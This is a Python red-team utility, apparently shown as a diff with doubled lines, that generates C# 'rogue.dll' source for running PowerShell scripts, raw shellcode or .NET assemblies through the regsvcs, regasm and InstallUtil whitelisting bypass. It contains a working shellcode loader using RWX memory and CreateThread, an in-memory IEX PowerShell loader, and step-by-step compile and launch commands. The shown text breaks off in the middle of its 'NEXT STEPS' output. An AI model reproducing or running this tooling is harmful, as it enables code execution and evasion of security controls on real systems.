# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# x64:
|
# x64:
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
import os
|
import os
|
||||||
import io
|
import io
|
||||||
import sys
|
import sys
|
||||||
import gzip
|
import gzip
|
||||||
import base64
|
import base64
|
||||||
import string
|
import string
|
||||||
import struct
|
import struct
|
||||||
import random
|
import random
|
||||||
import binascii
|
import binascii
|
||||||
import argparse
|
import argparse
|
||||||
|
|
||||||
|
|
||||||
def getCompressedPayload(filePath):
|
def getCompressedPayload(filePath):
|
||||||
out = io.BytesIO()
|
out = io.BytesIO()
|
||||||
encoded = ''
|
encoded = ''
|
||||||
with open(filePath, 'rb') as f:
|
with open(filePath, 'rb') as f:
|
||||||
inp = f.read()
|
inp = f.read()
|
||||||
|
|
||||||
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
|
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
|
||||||
fo.write(inp)
|
fo.write(inp)
|
||||||
|
|
||||||
encoded = base64.b64encode(out.getvalue())
|
encoded = base64.b64encode(out.getvalue())
|
||||||
|
|
||||||
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
|
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
|
||||||
encoded.decode()
|
encoded.decode()
|
||||||
)
|
)
|
||||||
return powershell
|
return powershell
|
||||||
|
|
||||||
def getSourceFileContents(payload, _format):
|
def getSourceFileContents(payload, _format):
|
||||||
launchCode = ''
|
launchCode = ''
|
||||||
usings = ''
|
usings = ''
|
||||||
|
|
||||||
if _format == 'exe':
|
if _format == 'exe':
|
||||||
|
|
||||||
exeLaunchCode = string.Template('''
|
exeLaunchCode = string.Template('''
|
||||||
public static void Execute() {
|
public static void Execute() {
|
||||||
|
|
||||||
string payload = "$payload2";
|
string payload = "$payload2";
|
||||||
byte[] decoded = System.Convert.FromBase64String(payload);
|
byte[] decoded = System.Convert.FromBase64String(payload);
|
||||||
|
|
||||||
Assembly asm = Assembly.Load(decoded);
|
Assembly asm = Assembly.Load(decoded);
|
||||||
MethodInfo method = asm.EntryPoint;
|
MethodInfo method = asm.EntryPoint;
|
||||||
object instance = asm.CreateInstance(method.Name);
|
object instance = asm.CreateInstance(method.Name);
|
||||||
method.Invoke(instance, null);
|
method.Invoke(instance, null);
|
||||||
|
|
||||||
}''').safe_substitute(
|
}''').safe_substitute(
|
||||||
payload2 = base64.b64encode(payload.encode()).decode()
|
payload2 = base64.b64encode(payload.encode()).decode()
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
launchCode = exeLaunchCode
|
launchCode = exeLaunchCode
|
||||||
|
|
||||||
elif _format == 'raw':
|
elif _format == 'raw':
|
||||||
|
|
||||||
foo = str(binascii.hexlify(payload), 'ascii')
|
foo = str(binascii.hexlify(payload), 'ascii')
|
||||||
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
|
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
|
||||||
encodedPayload = ' '
|
encodedPayload = ' '
|
||||||
|
|
||||||
for i in range(len(fooarr)):
|
for i in range(len(fooarr)):
|
||||||
if i % 16 == 0 and i > 0:
|
if i % 16 == 0 and i > 0:
|
||||||
encodedPayload += '\n '
|
encodedPayload += '\n '
|
||||||
encodedPayload += '{}, '.format(fooarr[i])
|
encodedPayload += '{}, '.format(fooarr[i])
|
||||||
|
|
||||||
encodedPayload = encodedPayload.strip()[:-1]
|
encodedPayload = encodedPayload.strip()[:-1]
|
||||||
|
|
||||||
shellcodeLoader = string.Template('''
|
shellcodeLoader = string.Template('''
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern IntPtr VirtualAlloc(
|
private static extern IntPtr VirtualAlloc(
|
||||||
IntPtr lpAddress, UIntPtr dwSize,
|
IntPtr lpAddress, UIntPtr dwSize,
|
||||||
UInt32 flAllocationType,
|
UInt32 flAllocationType,
|
||||||
UInt32 flProtect
|
UInt32 flProtect
|
||||||
);
|
);
|
||||||
|
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern bool VirtualFree(
|
private static extern bool VirtualFree(
|
||||||
IntPtr lpAddress,
|
IntPtr lpAddress,
|
||||||
UInt32 dwSize,
|
UInt32 dwSize,
|
||||||
UInt32 dwFreeType
|
UInt32 dwFreeType
|
||||||
);
|
);
|
||||||
|
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern IntPtr CreateThread(
|
private static extern IntPtr CreateThread(
|
||||||
UInt32 lpThreadAttributes,
|
UInt32 lpThreadAttributes,
|
||||||
UInt32 dwStackSize,
|
UInt32 dwStackSize,
|
||||||
IntPtr lpStartAddress,
|
IntPtr lpStartAddress,
|
||||||
IntPtr param,
|
IntPtr param,
|
||||||
UInt32 dwCreationFlags,
|
UInt32 dwCreationFlags,
|
||||||
ref UInt32 lpThreadId
|
ref UInt32 lpThreadId
|
||||||
);
|
);
|
||||||
|
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern bool CloseHandle(
|
private static extern bool CloseHandle(
|
||||||
IntPtr hHandle
|
IntPtr hHandle
|
||||||
);
|
);
|
||||||
|
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern UInt32 WaitForSingleObject(
|
private static extern UInt32 WaitForSingleObject(
|
||||||
IntPtr hHandle,
|
IntPtr hHandle,
|
||||||
UInt32 dwMilliseconds
|
UInt32 dwMilliseconds
|
||||||
);
|
);
|
||||||
|
|
||||||
private static UInt32 MEM_COMMIT = 0x1000;
|
private static UInt32 MEM_COMMIT = 0x1000;
|
||||||
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||||
private static UInt32 MEM_RELEASE = 0x8000;
|
private static UInt32 MEM_RELEASE = 0x8000;
|
||||||
|
|
||||||
public static void Execute() {
|
public static void Execute() {
|
||||||
|
|
||||||
byte[] payload = new byte[$payloadSize] {
|
byte[] payload = new byte[$payloadSize] {
|
||||||
$payload2
|
$payload2
|
||||||
};
|
};
|
||||||
|
|
||||||
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
||||||
IntPtr hThread = IntPtr.Zero;
|
IntPtr hThread = IntPtr.Zero;
|
||||||
UInt32 threadId = 0;
|
UInt32 threadId = 0;
|
||||||
|
|
||||||
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
|
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
|
||||||
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||||
|
|
||||||
CloseHandle(hThread);
|
CloseHandle(hThread);
|
||||||
VirtualFree(funcAddr, 0, MEM_RELEASE);
|
VirtualFree(funcAddr, 0, MEM_RELEASE);
|
||||||
|
|
||||||
}''').safe_substitute(
|
}''').safe_substitute(
|
||||||
payload2 = encodedPayload,
|
payload2 = encodedPayload,
|
||||||
payloadSize = len(payload)
|
payloadSize = len(payload)
|
||||||
)
|
)
|
||||||
|
|
||||||
launchCode = shellcodeLoader
|
launchCode = shellcodeLoader
|
||||||
|
|
||||||
else:
|
else:
|
||||||
usings += '''
|
usings += '''
|
||||||
using System.Management.Automation;
|
using System.Management.Automation;
|
||||||
using System.Management.Automation.Runspaces;
|
using System.Management.Automation.Runspaces;
|
||||||
'''
|
'''
|
||||||
powershellLaunchCode = string.Template('''
|
powershellLaunchCode = string.Template('''
|
||||||
public static void Execute() {
|
public static void Execute() {
|
||||||
|
|
||||||
byte[] payload = System.Convert.FromBase64String("$payload2");
|
byte[] payload = System.Convert.FromBase64String("$payload2");
|
||||||
string decoded = System.Text.Encoding.UTF8.GetString(payload);
|
string decoded = System.Text.Encoding.UTF8.GetString(payload);
|
||||||
|
|
||||||
Runspace runspace = RunspaceFactory.CreateRunspace();
|
Runspace runspace = RunspaceFactory.CreateRunspace();
|
||||||
runspace.Open();
|
runspace.Open();
|
||||||
|
|
||||||
Pipeline pipeline = runspace.CreatePipeline();
|
Pipeline pipeline = runspace.CreatePipeline();
|
||||||
pipeline.Commands.AddScript(decoded);
|
pipeline.Commands.AddScript(decoded);
|
||||||
pipeline.Invoke();
|
pipeline.Invoke();
|
||||||
|
|
||||||
runspace.Close();
|
runspace.Close();
|
||||||
}''').safe_substitute(
|
}''').safe_substitute(
|
||||||
payload2 = base64.b64encode(payload.encode()).decode()
|
payload2 = base64.b64encode(payload.encode()).decode()
|
||||||
)
|
)
|
||||||
|
|
||||||
launchCode = powershellLaunchCode
|
launchCode = powershellLaunchCode
|
||||||
|
|
||||||
|
|
||||||
template = string.Template('''
|
template = string.Template('''
|
||||||
using System;
|
using System;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Reflection;
|
using System.Reflection;
|
||||||
using System.Runtime.InteropServices;
|
using System.Runtime.InteropServices;
|
||||||
using System.EnterpriseServices;
|
using System.EnterpriseServices;
|
||||||
$usings
|
$usings
|
||||||
|
|
||||||
/*
|
/*
|
||||||
Author: Casey Smith, Twitter: @subTee
|
Author: Casey Smith, Twitter: @subTee
|
||||||
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
|
|
||||||
Step 1: Create Your Strong Name Key -> key.snk
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
||||||
$Content = [System.Convert]::FromBase64String($key)
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
Set-Content key.snk -Value $Content -Encoding Byte
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
Step 2: Compile source code:
|
Step 2: Compile source code:
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
Step 3: Execute your payload!
|
Step 3: Execute your payload!
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
*/
|
*/
|
||||||
|
|
||||||
namespace Program
|
namespace Program
|
||||||
{
|
{
|
||||||
public class Bypass : ServicedComponent
|
public class Bypass : ServicedComponent
|
||||||
{
|
{
|
||||||
public Bypass()
|
public Bypass()
|
||||||
{
|
{
|
||||||
}
|
}
|
||||||
|
|
||||||
// This executes if registration is successful
|
// This executes if registration is successful
|
||||||
[ComRegisterFunction]
|
[ComRegisterFunction]
|
||||||
public static void RegisterClass( string key )
|
public static void RegisterClass( string key )
|
||||||
{
|
{
|
||||||
Shellcode.Execute();
|
Shellcode.Execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
// This executes if registration fails
|
// This executes if registration fails
|
||||||
[ComUnregisterFunction]
|
[ComUnregisterFunction]
|
||||||
public static void UnRegisterClass( string key )
|
public static void UnRegisterClass( string key )
|
||||||
{
|
{
|
||||||
Shellcode.Execute();
|
Shellcode.Execute();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
[System.ComponentModel.RunInstaller(true)]
|
[System.ComponentModel.RunInstaller(true)]
|
||||||
public class ForInstallUtil : System.Configuration.Install.Installer
|
public class ForInstallUtil : System.Configuration.Install.Installer
|
||||||
{
|
{
|
||||||
// This executes during InstallUtil /U invocation
|
// This executes during InstallUtil /U invocation
|
||||||
public override void Uninstall(System.Collections.IDictionary savedState)
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
||||||
{
|
{
|
||||||
Shellcode.Execute();
|
Shellcode.Execute();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
public class Shellcode
|
public class Shellcode
|
||||||
{
|
{
|
||||||
$launchCode
|
$launchCode
|
||||||
}
|
}
|
||||||
}''').safe_substitute(
|
}''').safe_substitute(
|
||||||
launchCode = launchCode,
|
launchCode = launchCode,
|
||||||
usings = usings
|
usings = usings
|
||||||
)
|
)
|
||||||
|
|
||||||
return template
|
return template
|
||||||
|
|
||||||
def detectFileIsExe(filePath, forced = False):
|
def detectFileIsExe(filePath, forced = False):
|
||||||
first1000 = []
|
first1000 = []
|
||||||
|
|
||||||
with open(filePath, 'rb') as f:
|
with open(filePath, 'rb') as f:
|
||||||
first1000 = f.read()[:1000]
|
first1000 = f.read()[:1000]
|
||||||
|
|
||||||
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
|
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
|
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
|
||||||
|
|
||||||
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
|
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
dosStub = "This program cannot be run in DOS mode."
|
dosStub = "This program cannot be run in DOS mode."
|
||||||
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
|
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
|
||||||
|
|
||||||
#if not dosStub in printables:
|
#if not dosStub in printables:
|
||||||
# return False
|
# return False
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
def opts(argv):
|
def opts(argv):
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
||||||
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
||||||
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
||||||
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
|
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
|
||||||
|
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
|
|
||||||
if args.exe and args.raw:
|
if args.exe and args.raw:
|
||||||
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
|
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
return args
|
return args
|
||||||
|
|
||||||
def main(argv):
|
def main(argv):
|
||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
print('Usage: ./generateRogueDotNet.py <inputFile>')
|
print('Usage: ./generateRogueDotNet.py <inputFile>')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
args = opts(argv)
|
args = opts(argv)
|
||||||
|
|
||||||
_format = 'powershell'
|
_format = 'powershell'
|
||||||
|
|
||||||
if args.exe:
|
if args.exe:
|
||||||
if not detectFileIsExe(args.inputFile, args.exe):
|
if not detectFileIsExe(args.inputFile, args.exe):
|
||||||
sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
|
sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
|
||||||
return False
|
return False
|
||||||
|
|
||||||
_format = 'exe'
|
_format = 'exe'
|
||||||
sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
|
sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
|
||||||
with open(args.inputFile, 'rb') as f:
|
with open(args.inputFile, 'rb') as f:
|
||||||
payload = f.read()
|
payload = f.read()
|
||||||
|
|
||||||
elif args.raw:
|
elif args.raw:
|
||||||
_format = 'raw'
|
_format = 'raw'
|
||||||
sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
|
sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
|
||||||
with open(args.inputFile, 'rb') as f:
|
with open(args.inputFile, 'rb') as f:
|
||||||
payload = f.read()
|
payload = f.read()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
sys.stderr.write('[+] Powershell code given.\n')
|
sys.stderr.write('[+] Powershell code given.\n')
|
||||||
|
|
||||||
if args.inputFile.endswith('.exe'):
|
if args.inputFile.endswith('.exe'):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
payload = getCompressedPayload(args.inputFile)
|
payload = getCompressedPayload(args.inputFile)
|
||||||
|
|
||||||
output = getSourceFileContents(payload, _format)
|
output = getSourceFileContents(payload, _format)
|
||||||
|
|
||||||
print(output)
|
print(output)
|
||||||
|
|
||||||
management = ''
|
management = ''
|
||||||
if _format == 'powershell':
|
if _format == 'powershell':
|
||||||
management = ' /r:System.Management.Automation.dll'
|
management = ' /r:System.Management.Automation.dll'
|
||||||
|
|
||||||
commands = '''
|
commands = '''
|
||||||
|
|
||||||
=====================================
|
=====================================
|
||||||
NEXT STEPS:
|
NEXT STEPS:
|
||||||
|
|
||||||
Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory)
|
Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory)
|
||||||
|
|
||||||
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
||||||
$Content = [System.Convert]::FromBase64String($key)
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
Set-Content key.snk -Value $Content -Encoding Byte
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
Step 2: Compile source code:
|
Step 2: Compile source code:
|
||||||
